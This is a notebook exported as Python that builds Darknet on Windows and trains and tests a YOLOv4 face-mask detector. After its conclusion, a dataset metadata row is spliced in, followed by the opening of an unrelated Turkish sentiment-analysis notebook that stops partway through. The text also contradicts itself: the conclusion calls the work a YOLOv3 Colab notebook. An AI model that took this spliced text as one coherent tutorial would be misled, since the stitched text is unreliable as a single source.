# In this notebook we will train a custom object detector using YOLO v4, Specially a face mask detector.
#
# Just for your consideration, we will be creating a folder named YOLO. In the parent directory is located this notebook, but all other files are inside the YOLO folder.
#
# On the other hand, we will be working with Visual Studio 2019. So you will have to make this minor change in cmake to work. Remember to fix the architecture if you are not using Visual Studio 2019 (default in other is 32-bits, we will be working on 64-bits).
#
# Pre-requisites for this to work faster is to install CUDA Toolkit and cudnn libraries from the NVIDIA website.
#
# The results of this windows machine where over a NVIDIA GeForce 1660Ti.
#
# **NOTES**:
# - *POWERSHELL DOWNLOADING PRETRAINED WEIGHTS TO TEST THE COMPILATION OF DARKNET IS REALLY SLOW, YOU WILL PREFFER TO DO IT MANUALLY*
# - *THE OUTPUTS OF THE TRAINING ARE CLEARED, WE SHARED TO YOU THE RESULTS AND THE PRE-TRAINED WEIGHT, SEE THE README.MD*
# -
# ### <font color="blue">0. Importing and Helper Functions </font>
#
# In this section we will make use of our helper functions that will ease the use over the entire notebook.
# Just some imports:
# - os : path handling
# - cv2: image processing
# - IPython: for audio play
# - datetime: for getting the timestamp
# - random: for shuflying data
# - subprocess: for calling functions of the system
import random
import os
import subprocess
import sys
import cv2
import matplotlib.pyplot as plt
from IPython.display import Audio
from datetime import datetime
# %matplotlib inline
# This is where a nice soundwave is located on the machine for just tell us when the training ended or when processing YOLO video when it ends to patch the video with the predictions.
#
# Trainings vary from 2 hrs to 30 hrs so is good if you are near to hear that it finished.
# FIX: raw string so the backslashes in the Windows path can never be
# interpreted as escape sequences (value itself is unchanged).
sound_file = r'C:\Windows\Media\Ring10.wav'
# The utility function below will help us to display the test image and its predicted labels, also will save the picture on the results folder
# + colab={} colab_type="code" id="qLFSmTDSFeMc"
# Utility function to display the output
def display_output(imagePath):
    """Show a test image beside Darknet's 'predictions.jpg' and save the figure.

    The side-by-side comparison is written to
    ``<first path part>\result\yolov4\<name>-yolov4--<timestamp>.png``.

    Args:
        imagePath: backslash-separated relative path of the test image
            (expected layout: ``<root>\<subdir>\<name>.<ext>``).
    """
    src = cv2.imread(imagePath,1)
    # Darknet writes its annotated output to predictions.jpg in the CWD.
    output = cv2.imread("predictions.jpg")
    plt.figure(figsize=[20,8])
    plt.subplot(121)
    plt.imshow(src[:,:,::-1])      # BGR -> RGB for matplotlib
    plt.title("Original Image")
    plt.subplot(122)
    plt.imshow(output[:,:,::-1])
    plt.title("Predictions")
    file_name = imagePath.split('\\')
    # FIX: take the LAST path component (the original indexed file_name[2],
    # which broke for paths not exactly three levels deep) and use splitext
    # so dotted file names are no longer truncated at the first '.'.
    name_only = os.path.splitext(file_name[-1])[0]
    now = datetime.now() # current date and time
    build = now.strftime("%m-%d-%Y_%H_%M_%S")
    file_save_path = os.path.join(file_name[0], 'result', 'yolov4')
    # FIX: create the result folder on demand so savefig cannot fail on a
    # missing directory.
    os.makedirs(file_save_path, exist_ok=True)
    save_name = os.path.join(file_save_path, name_only + '-yolov4--' + build +'.png')
    plt.savefig(save_name)
    plt.show()
# -
# This class will help us to read a file and modify their lines in a easy way. An example of usage is in comments below. On the other hand you will use it on the entire document.
# +
# Utility class to modify files
# Get a file handler
# mkf = FileMod(doc='.\Makefile')
# Load the file and view the line numbers
# mkf.load(doc='.\Makefile')
# make a dictionary to modify the file
# mkf_dict = dict({
# 0:'GPU=1',
# 2: 'CUDNN_HALF=1'
# })
# mkf.mod(mod_lines=mkf_dict)
# view the print out without line numbers (optional)
# mkf.view() # view 20 lines
# ... or ...
# mkf.view(10) # view 10 lines
class FileMod():
    """Small helper to inspect and patch individual lines of a text file.

    Typical notebook usage:
        mkf = FileMod(doc='Makefile')
        mkf.mode                          # current open mode ('r' by default)
        mkf.load()                        # print numbered lines, cache them
        mkf.mod(mod_lines={0: 'GPU=1'})   # rewrite selected lines by index
        mkf.view()                        # print the first lines of the file
    """

    def __init__(self, doc=None, *args, **kwargs):
        super(FileMod, self).__init__()
        self.mode = 'r'   # current open mode; 'r' except while writing
        self.file = doc   # path of the file being edited
        self.dict = {}    # reserved for a pending {line_no: text} mapping
        self.lines = []   # cached lines of the file (filled by load())

    def load(self, doc=None):
        """Read *doc* (default: self.file), cache its lines, print them numbered.

        Errors are printed rather than raised so a bad path does not abort
        an interactive notebook session.
        """
        try:
            if doc is None:        # FIX: identity test instead of '== None'
                doc = self.file
            with open(doc, self.mode) as file:
                # read a list of lines into data
                data = file.readlines()
            self.lines = data
            for i, string in enumerate(self.lines):
                print(f"{i}:{string}")
        except Exception as e:
            # deliberately broad: this utility is used interactively
            print(e)

    def mod(self, mod_lines=None):
        """Replace cached lines per {line_no: new_text} and rewrite the file.

        load() must have been called first so self.lines is populated.
        A trailing newline is appended to each replacement text.
        """
        # and write everything back
        if mod_lines is None:      # FIX: identity test instead of '== None'
            return
        doc = self.file
        self.mode = 'w'
        for lines, data in mod_lines.items():
            string = data + '\n'
            self.lines[lines] = string
            print(f"mod {lines} as {string}")
        with open(doc, 'w') as file:
            file.writelines(self.lines)
        self.mode = 'r'            # restore read mode for later load()/view()

    def view(self, lines=None):
        """Print the first *lines* lines (default 20) of the file."""
        if lines is None:          # FIX: identity test instead of '== None'
            lines = 20
        doc = self.file
        with open(doc, self.mode) as file:
            # read a list of lines into data
            data = file.readlines()
        for line_num, line in enumerate(data):
            if line_num > lines - 1:
                break
            print(f"{line}\n")
# -
# In each step I am doing a dummy *ls* for seein in which folder we are
# %ls
# We will then create a folder named *YOLO* and will start working from here
# %mkdir YOLO
# %cd YOLO
# + [markdown] colab_type="text" id="hY4n3LaTPAeh"
# ### <font color="blue">1. Download Alexey AB YOLO repository to our google drive *yolov4* folder</font>
# We now will download the well maintained repository of a YOLO expert, because Joseph Redmon will not continue working on YOLO and because this repo work very well on Windows.
# + colab={"base_uri": "https://localhost:8080/", "height": 153} colab_type="code" executionInfo={"elapsed": 35335, "status": "ok", "timestamp": 1591401817040, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="h6YQz3eIOzVG" outputId="31d3ce46-9ec5-45ed-f230-75f5b4951336"
# !git clone https://github.com/AlexeyAB/darknet.git
# + [markdown] colab_type="text" id="9OaFsPQ6SZQU"
# ### <font color="blue">2. Compile Darknet</font>
# Next, some strings on the Makefile needs to be modified before we build darknet from the source.
# -
# %ls
# %cd darknet\build
# Patch the darknet Makefile so the build enables the GPU stack.
mkf = FileMod('..\Makefile')
mkf.load()
# line index in the Makefile -> replacement text
mkfdict = {
    0: 'GPU=1',
    1: 'CUDNN=1',
    3: 'OPENCV=1',
    4: 'AVX=1',
}
mkf.mod(mod_lines=mkfdict)
mkf.view()
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" executionInfo={"elapsed": 130508, "status": "ok", "timestamp": 1591401923096, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="v6JW5I2BSo6v" outputId="361fb0ea-2474-431b-a3b1-24835c523d14"
print("[INFO] - Building Darknet with cmake")
# !cmake -G "Visual Studio 16 2019" ..
# -
print("[INFO] - Building Darknet Release Mode")
# !cmake --build . --target ALL_BUILD
print("[INFO] - End of building darknet!")
print("[INFO] - Final Steps")
# !cmake --build . --target INSTALL
print("[INFO] - You are done for start training or detecting!")
# ### <font color="blue">3. Move DLLs To The Root Folder of Darknet</font>
#
# Darknet will need phtreadVC2.dll to load correctly so we will be putting it on the root of the darknet folder for simplifying things.
# %cd ..\
# %ls
# !copy 3rdparty\pthreads\bin\* .
# + [markdown] colab_type="text" id="vGt0Mlik2uOM"
# ### <font color="blue">4. Cloning the Pre-Trained Weights</font>
# We will be doing a compilation test with the pre-trained weights of YOLO v4 (just this time).
# -
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 377} colab_type="code" executionInfo={"elapsed": 142975, "status": "ok", "timestamp": 1591402066242, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="0q662XkF3BfP" outputId="d1dbfa3e-46e7-4963-c08b-a6f27c132b20"
# We will download the pre-trained weights of yolov4 just this time to test the darknet compilation
# This will take a lot of time, you preferibly will want to do it manually
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://github.com/AlexeyAB/darknet/releases/download/darknet_yolo_v3_optimal/yolov4.weights', 'yolov4.weights')"
Audio(sound_file, autoplay=True)
# -
# ### <font color="blue">5. Test The Compilation</font>
#
# If everything is OK, in predictions.jpg you will get the image with their bounding boxes and classifications of the classes detected by yolo.
# !darknet detect cfg\yolov4.cfg yolov4.weights data\dog.jpg -dont_show > NUL
# + [markdown] colab_type="text" id="hXnzCOgpT9hc"
# ### <font color="blue">6. Download the *Mask / No Mask Dataset*</font>
# Download the curated dataset of face mask and not facemask to our dataset folder, but first lets create a dataset folder.
#
# Usually i like to be very organized.
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" executionInfo={"elapsed": 15654, "status": "ok", "timestamp": 1591401938802, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="v_tq7-MxUUer" outputId="134c4ba8-7dcb-4473-86d1-377492b8599c"
# %ls
# -
# %cd ../
# Next we will download the dataset to this root folder *YOLO*, decompress it on another folder called *dataset* and finally erase the zip file.
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/6gewe947ake1g95/kaggle_and_no-mask_dataset.zip?dl=1', '.\kaggle_and_no-mask_dataset.zip')"
# !powershell -c "expand-archive -path 'kaggle_and_no-mask_dataset.zip' -destinationpath 'dataset'"
# !powershell -c "remove-item -path 'kaggle_and_no-mask_dataset.zip'"
# + [markdown] colab_type="text" id="kbVA4YIxZjac"
# ### <font color="blue">7. Prepare the Train and Test Files</font>
# This code provided creates two files, one for the training images and other for the test images.
#
# The dataset is divided in:
# - 80% training set
# - 20% test set
# -
# %ls
# + colab={} colab_type="code" id="tMqbf915Zi14"
# Split the dataset images into train (80%) and test (20%) file lists,
# written as one image path per line for darknet.
image_dir = "dataset"

f_val = open("DS_test.txt", 'w')
f_train = open("DS_train.txt", 'w')

# Collect only the .jpg images. The previous version sampled indices from
# len(all files) while counting jpg files from 1, so index 0 was never
# selectable and any non-jpg files (labels, etc.) shrank the actual test
# fraction below 20%.
jpg_files = [f for f in os.listdir(image_dir) if f.split(".")[-1] == "jpg"]
data_test_size = int(0.2 * len(jpg_files))
test_set = set(random.sample(jpg_files, k=data_test_size))

for f in jpg_files:
    if f in test_set:
        f_val.write(image_dir + '/' + f + '\n')
    else:
        f_train.write(image_dir + '/' + f + '\n')

f_train.close()
f_val.close()
# + [markdown] colab_type="text" id="jLrGjXfgftkD"
# ### <font color="blue">8. Prepare and Upload the configuration files</font>
#
# For train and use yolo we need to prepare the neccesary files, finally we will upload to our yolov4 folder.
#
# #### <font color="blue">8.1. Data Setup</font>
# In the file **`yolov4-mask_nomask-setup.data`**(uploaded to github and included here), we provided the correct specification of our paths.
#
# Below is the content of this file:
# ```
# classes = 2
# train = DS_train.txt
# valid = DS_test.txt
# names = FacialMaskDetector/yolov4/config/yolov4.names
# backup = FacialMaskDetector/yolov4/backup/
# ```
#
# #### <font color="blue">8.2. Training Config File</font>
# We also need to provide the **`yolov4-mask_nomask-train.cfg`**. Based on the default file of darknet folder cfg/yolov4.cfg
#
# #### <font color="blue">8.2.1 Batch hyper-parameter in YOLOv4</font>
# We maintain the batch size and the subdivision batch as the default of the file. That's 20 images to feed in two subgroups.
#
# For the *test configuration file* we will set these params to 1 because we will feed an image.
# ```
# batch=20
# subdivisions=10
# ```
# #### <font color="blue">8.2.2 Subdivisions configuration parameter in YOLOv4</font>
# For feeding the GPU correcly we slow the training, this action will ensure our machine will be able to train the detector but you could play with this parameter.
#
# In testing mode this will be equal to 1.
#
# ### <font color="blue">8.2.3 Width, Height, Channels</font>
# A higher resolution the detection will be better but you will sacrifice the time of training.
# ```
# width=352
# height=352
# channels=3
# ```
# ### <font color="blue">8.2.4 Momentum and Decay</font>
# These hyperparameters we will maintain as is.
# ```
# momentum=0.949
# decay=0.0005
# ```
#
# ### <font color="blue">8.2.5 Learning Rate, Steps, Scales, Burn In (warm-up)</font>
# Again, we will be maintaining these hyperparamters as default. The learning rate will be changed over the 800th iteration.
#
# ```
# learning_rate=0.0013
# policy=steps
# steps=6000
# scales=.1,.1
# burn_in=600
# ```
#
#
# ### <font color="blue">8.2.6 Data augmentation</font>
# For various lighting conditions and different color ranges (over other color spaces). Sometimes its good to change the angle because a few objects could be rotated. A facemask in this case we will maintain at 0 degrees but could be augmented to 3° or something low because we are detecting people.
# ```
# angle=0
# saturation = 1.5
# exposure = 1.5
# hue=.1
# ```
#
# #### <font color="blue">8.2.7 Number of iterations</font>
# Process 2000*n_classes iterations run as recommended. But we will keep in a higher number to see the performance.
# ```
# max_batches=6000
# ```
#
# #### <font color="blue">8.2.8 Change filters parameter in conv layers [Important for multiple objects]</font>
# Fini in the file the conv. layer before the yolo layer with the equation:
#
# **`filters=( classes + 5 ) * 3`**
#
# Our yolo classes are 2, so filters = 21.
#
# ### <font color="blue">8.3. yolov4.names file </font>
# Specify the classes as...
# - Mask (Class 0),
# - No-Mask (Class 1)
#
# ... class labels.
#
# ### <font color="blue">8.4. Improving The Network </font>
# We observed that on the AlexeyAB repo recommended change some hyperparameters for improving the training accuracy. These parameters modified are:
# - stride=4, near line 890
# - layers=23, near line 894
# - added max=200 or above at the end of the file
# + [markdown] colab_type="text" id="1ZDW77yt0BlX"
# ### <font color="blue">9. Cloning the configuration Repository</font>
# This repository is prepared with the desired configuration for yolov3 and yolov4.
#
# In this case we will be using yolo v4. The structure of the folder is as follows:
#
# ```
# /FacialMaskDetector
# ├── results
# │ ├── yolov3
# │ │ ├── README.md
# │ ├── yolov4
# │ ├── README.md
# ├── test
# │ ├── test-image1.jpg
# │ ├── test-image2.jpg
# │ ├── test-image3.jpg
# │ ├── test-image4.jpg
# │ ├── test-video1.jpg
# │ ├── test-video2.jpg
# ├── yolov3
# │ ├── backup
# │ │ ├── README.md
# │ ├── config
# │ │ ├── yolov3-mask_nomask-setup.data
# │ │ ├── yolov3-mask_nomask-test.cfg
# │ │ ├── yolov3-mask_nomask-train.cfg
# │ │ ├── yolov3.names
# │ ├── weights
# │ ├── README.md
# ├── yolov4
# │ ├── backup
# │ │ ├── README.md
# │ ├── config
# │ │ ├── yolov4-mask_nomask-setup.data
# │ │ ├── yolov4-mask_nomask-test.cfg
# │ │ ├── yolov4-mask_nomask-train.cfg
# │ │ ├── yolov4.names
# │ ├── weights
# │ ├── README.md
# ├── README.md
# ```
#
# This will ease for us the way of training and inference.
# -
# %ls
# + colab={"base_uri": "https://localhost:8080/", "height": 119} colab_type="code" executionInfo={"elapsed": 118337, "status": "ok", "timestamp": 1591402041573, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="8xjRp_7shXlH" outputId="94c160f9-e717-41fa-e595-c714c61fdc27"
# !git clone https://github.com/issaiass/FacialMaskDetector.git
# -
# We need to download the initial weights
# %cd FacialMaskDetector\yolov4\weights
# !powershell -c "(New-Object System.Net.WebClient).DownloadFile('"https://github.com/AlexeyAB/darknet/releases/download/darknet_yolo_v3_optimal/yolov4.conv.137"', 'yolov4.conv.137')"
Audio(sound_file, autoplay=True)
# %cd ..\..\..\
# + [markdown] colab_type="text" id="K-8dgvHU3ueH"
# ### <font color="blue">10. Review Hyperparameters</font>
#
# Here we will set the hyperparamters for training the YOLO v4 model.
# Below python variables to be the shortcut for fast insertion on the code.
# -
# Paths to the YOLOv4 configuration and weight files used by the shell
# commands below (Windows separators, relative to the notebook's cwd).
yolo_setup = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-setup.data'  # classes/train/valid/backup setup
yolo_train = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-train.cfg'  # network config for training
yolo_test = 'FacialMaskDetector\\yolov4\\config\\yolov4-mask_nomask-test.cfg'  # network config for inference
yolo_weights = 'FacialMaskDetector\\yolov4\\weights\\yolov4.conv.137'  # pre-trained convolutional weights
yolo_best_weights = 'FacialMaskDetector\\yolov4\\backup\\yolov4-mask_nomask-train_best.weights'  # best checkpoint from training
# %ls
CfgHandler = FileMod(yolo_train)
CfgHandler.load()
# Enable if you want to modify something in the file. If you didn't know what linew we changed, but its obvious, you could check at:
# - https://www.diffnow.com/
# - https://text-compare.com/
# +
# # DEFAULT
#config = dict({ 1:'batch=20', # 64
# 2:'subdivisions=10', # 8
# 6:'width=320', # 512
# 7:'height=320', # 512
# 19:'learning_rate=0.0013', # 0.0013
# 17:'burn_in=600', # 1000
# 18:'max_batches=6000', # 500500
# 20:'steps=4800,5400', # 400000,450000
# 21:'scales=.1,.1' # .1,.1
# 890:'stride=4' # 2
# 894:'layers=23' # 54
# 960:'filters=21' # 255
# 967:'classes=2' # 80
# 988:'stride=4' # 2
# 1048:'filter=21' # 255
# 1055:'classes=2' # 80
# 1136:'filters=21' # 255
# 1143:'classe=2' # 80
# 1157:'max=200' # <just leav it in blank with ''>
# })
#CfgHandler.mod('FacialMaskDetector/yolov4/config/yolov4-mask_nomask-train.cfg', config)
# -
CfgHandler.view(22)
# + [markdown] colab_type="text" id="XeCpPyeiz5Bt"
# ### <font color="blue">11. Start Training </font>
# We need to pass the training files for the darknet framework to start the process.
#
# Remember!, we need to specify the complete paths of these files that we talked before:
# 1. setup file,
# 1. config file,
# 1. convolutional weights file
#
# There are a few flags like **`dont_show`** which wont display the graphs and **`map`** - for the mAP calculation over the DS_test.txt file (20% of our data).
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" executionInfo={"elapsed": 1946, "status": "ok", "timestamp": 1591402709592, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="5R2PbMvqHA-o" outputId="a1d94c64-df34-4516-80fd-3524723b900c"
# %ls
# -
# Below the paths to insert as a variable in the command line as arguments, and to not repeat in the entire notebook
# We added an audio sound file, if you are near you will hear a ring tone.
#
# This is the same as:
#
# *!darknet\darknet detector train FacialMaskDetector\yolov4\config\yolov4-mask_nomask-setup.data FacialMaskDetector\yolov4\config\yolov4-mask_nomask-train.cfg FacialMaskDetector\yolov4\weights\yolov4.conv.137 -dont_show -map 2 > train_log.txt*
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" executionInfo={"elapsed": 21950875, "status": "ok", "timestamp": 1591424659111, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="zK145Zz00pho" outputId="ceba2823-323e-424c-ea57-476ff7b67574"
# Train!
# !darknet\darknet detector train $yolo_setup $yolo_train $yolo_weights -dont_show -map 2 > train_log.txt
Audio(sound_file, autoplay=True)
# + [markdown] colab_type="text" id="y0nACB5u96Qy"
# Our results:
# - class_id = 0, name = Mask, ap = 92.92% (TP = 490, FP = 56)
# - class_id = 1, name = No-Mask, ap = 75.62% (TP = 725, FP = 92)
#
# - for conf_thresh = 0.25, precision = 0.89, recall = 0.75, F1-score = 0.82
# - for conf_thresh = 0.25, TP = 1215, FP = 148, FN = 396, average IoU = 70.59 %
#
# - IoU threshold = 50 %, used Area-Under-Curve for each unique Recall
# - mean average precision ([email protected]) = 0.842709, or 84.27 %
#
#
# And the training time was about less than 8 hours depending of the max_batches and width x height of the configuration in the yolo training file.
# + [markdown] colab_type="text" id="0dNCxx904F24"
# ### <font color="blue">12. Make Inferences</font>
#
# First we did a first step that is to copy the data folder of darknet to the root, because inside are the labels to graph the letters and numbers. If this step is omited you will see a black box and no inference name.
#
# Next we will have a piece of code for displaying and finally are the inferences of images and pre-recorded video.
#
# The pre-recorded video could be downloaded over the root folder, in this case, our YOLO folder (created on Google Drive)
# -
# %ls
# !mkdir data
# !Xcopy /E /I darknet\data\* data
# + [markdown] colab_type="text" id="4CBm0hURLVXm"
# Below we will list the test files
# -
# Sort the directory listing so indices are deterministic (os.listdir order is
# platform-dependent): test_files[0..3] are the images, [4..5] the videos.
test_files = [os.path.join('FacialMaskDetector\\test', v) for v in sorted(os.listdir('FacialMaskDetector\\test'))]
# + [markdown] colab_type="text" id="wIv4_my88HAx"
# #### <font color="blue">12.1 Scenario 1</font>
#
# Testing only with one man and with facemask.
# -
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image1.jpg -thresh .6 2 > NUL
display_output(test_files[0])
# + [markdown] colab_type="text" id="Z5nqfcco8W2w"
# #### <font color="blue">12.2 Scenario 2</font>
#
# Testing with different angles of people wearing mask and other not wearing.
# + colab={"base_uri": "https://localhost:8080/", "height": 484} colab_type="code" executionInfo={"elapsed": 13659, "status": "ok", "timestamp": 1591426397186, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="Wgvua3eJgtpn" outputId="fa52184d-6c95-417d-d449-e58aa275bfb4"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image2.jpg -thresh .6 2 > NUL
# -
display_output(test_files[1])
# + [markdown] colab_type="text" id="fFkEby8I8jr3"
# #### <font color="blue">12.3 Scenario 3</font>
#
# Testing with a crowd with and without facemask and different scales and variations
# + colab={"base_uri": "https://localhost:8080/", "height": 679} colab_type="code" executionInfo={"elapsed": 21960396, "status": "ok", "timestamp": 1591424718897, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="vCbtSEtAgu6E" outputId="3bb14371-ec93-46ac-da24-33cb00d715c9"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image3.jpg -thresh .6 2 > NUL
# -
display_output(test_files[2])
# + [markdown] colab_type="text" id="QHxgZ_su8zn4"
# #### <font color="blue">12.4 Scenario 4</font>
#
# Testing with several people walking trough the plaza.
# + colab={"base_uri": "https://localhost:8080/", "height": 573} colab_type="code" executionInfo={"elapsed": 14481, "status": "ok", "timestamp": 1591425557805, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="Iu9qUtq8hKhj" outputId="3c5a0672-3f94-4f75-d0fa-48b5bf9accf5"
# !darknet\darknet detector test $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-image4.jpg -thresh .6 2 > NUL
# -
display_output(test_files[3])
# + [markdown] colab_type="text" id="2vpI_A3t89Ce"
# #### <font color="blue">12.5 Scenario 5</font>
#
# Testing over a video of people wearing or not wearing mask, good lighting conditions. Probably will take between 1.5 to 3 min for generate the video.
# -
# !darknet\darknet detector demo $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-video1.mp4 -thresh .6 2 -out_filename out-vid1.avi -dont_show
Audio(sound_file, autoplay=True)
# + [markdown] colab_type="text" id="G-OEDvCI9Itt"
# #### <font color="blue">12.6 Scenario 6</font>
#
# A video of the crowd. Variable ligth conditions. The video will be generated between 5 to 7 minutes.
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" executionInfo={"elapsed": 22044271, "status": "ok", "timestamp": 1591424806273, "user": {"displayName": "Rangel Alvarado", "photoUrl": "https://lh3.googleusercontent.com/a-/AOh14GgrnIdLDrC0TrgBX38dBKASDPlPC_cVM2-325_j=s64", "userId": "11539925403577826856"}, "user_tz": 300} id="ojE1UrTQlxOi" outputId="d6143da1-51c1-48d8-d426-19212387b2b7"
# !darknet\darknet detector demo $yolo_setup $yolo_test $yolo_best_weights FacialMaskDetector\test\test-video2.mp4 -thresh .6 2 -out_filename out-vid2.avi -dont_show
Audio(sound_file, autoplay=True)
# -
# Finally, move the two videos to the result folder
# !powershell -c "Move-Item out-vid1.avi FacialMaskDetector\\result\\yolov4\\"
# !powershell -c "Move-Item out-vid2.avi FacialMaskDetector\\result\\yolov4\\"
# + [markdown] colab_type="text" id="eJz2J3-r6BSD"
# ### <font color="blue">13. Conclusion</font>
#
# This concludes the yolo v3 training and inference google colab notebook.
#
# The disadvantage of GPU for large training datasets will leave you to wait the availability of free GPUs on the cloud (Colab/Kaggle).
#
# There are other alternatives like Azure, Watson and Amazon Web Services, but those ones charge you by GPU usage over time.
#
# For this and other reasons people like to build their "low cost" deep learning rig to prepare their trainers.
#
# If you like to retrain, you could always start with the final weights and retrain over it, continuing with the last point of training will converge faster to your solution.
#
#
| 27,696 |
/udemy_data_science/text_data_mining/.ipynb_checkpoints/nlp_end_to_end-checkpoint.ipynb
|
4b0955fdbc3737bd9156cb5fede1ae3dedb0a390
|
[] |
no_license
|
abdullahbodur/ai-journey
|
https://github.com/abdullahbodur/ai-journey
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 67,545 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# ## Sentiment Analizi & Sınıflandırma Problemleri
# +
from textblob import TextBlob
from sklearn import model_selection, preprocessing, linear_model, naive_bayes, metrics
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn import decomposition, ensemble
import pandas, xgboost, numpy, textblob, string
from keras.preprocessing import text, sequence
from keras import layers, models, optimizers
from warnings import filterwarnings
filterwarnings('ignore')
# -
# Load the phrase-level movie-review sentiment dataset (tab-separated).
import pandas as pd
data = pd.read_csv('train.tsv',sep='\t')
data.head()
# #### Yapacaklarımız
#
# Verisetinde hazır sentiment değişkeni oluşturulmuş. Biz bu değişken olmasaydı bile kendimiz bunu oluşturacaktık. <br>
#
# * Sentiment değişkenini oluşturma
#
# Hazır oluşturulmuş sentiment 0-4 arasında değer almakta... <br><br>
#
# 0-1 : kötü yorum skorları<br>
# 2 : orta sınıf <br>
# 3-4 : iyi yorum skoraları<br><br>
#
# * biz bu aralığı negative-positive taglemesi yapacağız....<br>
# #### NEG-POS Taglemesi
# +
# negatifler
# -
# Collapse the 5-point sentiment scale to binary labels in one dict-based
# replace: 0/1 -> negative, 3/4 -> positive. The neutral class (2) is
# dropped in the next cell. A single assignment avoids four chained
# inplace replaces, which pandas 2.x deprecates on column views.
data['Sentiment'] = data['Sentiment'].replace(
    {0: 'negative', 1: 'negative', 3: 'positive', 4: 'positive'})
# +
# 2 değerini dışarıda bırakalım.....
# -
data = data[data.Sentiment != 2]
data.head()
# +
# kontrol edelim
# -
data.groupby('Sentiment').count()
# +
# metini ön işlemeden önce dataframe i 2 değişkene indirgeyelim...
# -
# Keep only the text and its label, under generic column names.
df = pd.DataFrame({
    'text': data['Phrase'].copy(),
    'label': data['Sentiment'].copy(),
})
df.head()
# #### Metin Ön İşleme
# +
# --- text preprocessing pipeline ---
# lowercase everything
df['text'] = df['text'].apply(lambda x: x.lower())
# strip punctuation. Raw string + regex=True: since pandas 2.0,
# Series.str.replace treats the pattern as a literal by default, which
# silently disabled this cleanup.
df['text'] = df['text'].str.replace(r'[^\w\s]', '', regex=True)
# strip digits
df['text'] = df['text'].str.replace(r'\d', '', regex=True)
# remove English stopwords
import nltk
from nltk.corpus import stopwords
sw = stopwords.words('english')
df['text'] = df['text'].apply(lambda x: ' '.join(word for word in x.split() if word not in sw))
# drop the 1000 rarest words (membership test is against the Series index)
sparse_words = pd.Series(' '.join(df['text']).split()).value_counts()[-1000:]
df['text'] = df['text'].apply(lambda x: ' '.join(word for word in x.split() if word not in sparse_words))
# lemmatize each word
from textblob import Word
df['text'] = df['text'].apply(lambda x: ' '.join(Word(w).lemmatize() for w in x.split()))
# -
df.head()
# ## Değişken Mühendisliği (Feature Engineering)
# Amaç bir texti makine öğrenimine sokabilmek için gereken sayısal verileri üretmektir. <br>
#
# * Count Vectors (bütün gözlemlerdeki unique kelimeler bir değişken olarak atanır ve gözlemlerde görülme sıklığı incelenir.)
# * TF-IDF Vectors (***words ,characters, n-grams***)
# * Word Embeddings (bütün kelimelerden bir kelime uzayı çıkartılıp gözlemin kelime yoğunluğu hesaplanır. [wiki](https://en.wikipedia.org/wiki/Word_embedding))
#
# TF(t) = (Bir t teriminin bir dökümanda gözlenme frekansı) / (dökümandaki toplam terim sayısı) <br>
#
# IDF(t) = log_e(Toplam döküman sayısı / içeride t terimi olan belge sayısı)<br>
# ### Test-Train
# Train/test split (scikit-learn default: 75% train, 25% test).
train_x, test_x, train_y, test_y = model_selection.train_test_split(df['text'], df['label'])
train_x[:2]

# +
